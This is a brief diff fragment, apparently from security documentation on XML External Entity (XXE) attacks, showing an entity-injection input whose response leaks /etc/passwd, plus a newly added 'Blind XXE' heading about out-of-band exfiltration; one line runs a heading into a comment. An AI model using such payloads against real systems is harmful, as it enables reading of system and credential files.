 <input>&file;</input>

-// Response contains /etc/passwd contents
+// Response contains /etc/passwd contents2.
+Blind XXE

 No direct response, but attackers can exfiltrate data via out-of-band channels: